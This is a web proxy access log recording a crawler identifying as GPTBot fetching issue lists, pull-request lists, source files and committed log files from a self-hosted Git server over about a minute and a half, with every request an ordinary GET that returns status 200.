"/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12765] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12375] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 410189] [Gzip 15.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:18:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14695] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:18:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 30737] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:18:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28745] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:18:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 97613] [Gzip 18.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:18:29:00 +0000] - 200 200 - GET https 